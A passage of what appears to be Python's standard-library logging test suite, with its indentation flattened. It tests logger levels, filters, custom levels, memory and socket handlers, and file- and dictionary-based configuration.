('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warn(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
#Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warn(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warn(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> ([\w]+): ([\d]+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warn(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
def apply_config(self, conf):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
class LogRecordStreamHandler(StreamRequestHandler):
"""Handler for a streaming logging request. It saves the log message in the
TCP server's 'log_output' attribute."""
TCP_LOG_END = "!!!END!!!"
def handle(self):
"""Handle multiple requests - each expected to be of 4-byte length,
followed by the LogRecord in pickle format. Logs the record
according to whatever policy is configured locally."""
while True:
chunk = self.connection.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + self.connection.recv(slen - len(chunk))
obj = self.unpickle(chunk)
record = logging.makeLogRecord(obj)
self.handle_log_record(record)
def unpickle(self, data):
return pickle.loads(data)
def handle_log_record(self, record):
# If the end-of-messages sentinel is seen, tell the server to
# terminate.
if self.TCP_LOG_END in record.msg:
self.server.abort = 1
return
self.server.log_output += record.msg + "\n"
class LogRecordSocketReceiver(ThreadingTCPServer):
"""A simple-minded TCP socket-based logging receiver suitable for test
purposes."""
allow_reuse_address = 1
log_output = ""
def __init__(self, host='localhost',
port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,
handler=LogRecordStreamHandler):
ThreadingTCPServer.__init__(self, (host, port), handler)
self.abort = False
self.timeout = 0.1
self.finished = threading.Event()
def serve_until_stopped(self):
while not self.abort:
rd, wr, ex = select.select([self.socket.fileno()], [], [],
self.timeout)
if rd:
self.handle_request()
# Notify the main thread that we're about to exit
self.finished.set()
# close the listen socket
self.server_close()
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.tcpserver = LogRecordSocketReceiver(port=0)
self.port = self.tcpserver.socket.getsockname()[1]
self.threads = [
threading.Thread(target=self.tcpserver.serve_until_stopped)]
for thread in self.threads:
thread.start()
self.sock_hdlr = logging.handlers.SocketHandler('localhost', self.port)
self.sock_hdlr.setFormatter(self.root_formatter)
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
def tearDown(self):
"""Shutdown the TCP server."""
try:
self.tcpserver.abort = True
del self.tcpserver
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
for thread in self.threads:
thread.join(2.0)
finally:
BaseTest.tearDown(self)
def get_output(self):
"""Get the log output as received by the TCP server."""
# Signal the TCP receiver and wait for it to terminate.
self.root_logger.critical(LogRecordStreamHandler.TCP_LOG_END)
self.tcpserver.finished.wait(2.0)
return self.tcpserver.log_output
def test_output(self):
# The log message sent to the SocketHandler is properly received.
logger = logging.getLogger("tcp")
logger.error("spam")
logger.debug("eggs")
self.assertEqual(self.get_output(), "spam\neggs\n")
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
#Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
#Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
#Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
try:
warnings.filterwarnings("always", category=UserWarning)
file = io.StringIO()
h = logging.StreamHandler(file)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = file.getvalue()
h.close()
self.assertTrue(s.find("UserWarning: I'm warning you...\n") > 0)
#See if an explicit file uses the original implementation
file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
file, "Dummy line")
s = file.getvalue()
file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
finally:
logging.captureWarnings(False)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
expected_log_pat = r"^([\w]+) \+\+ ([\w]+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#config 7 does not define compiler.parser but defines compiler.lexer
#so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
#As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
#As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
#As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
def apply_config(self, conf):
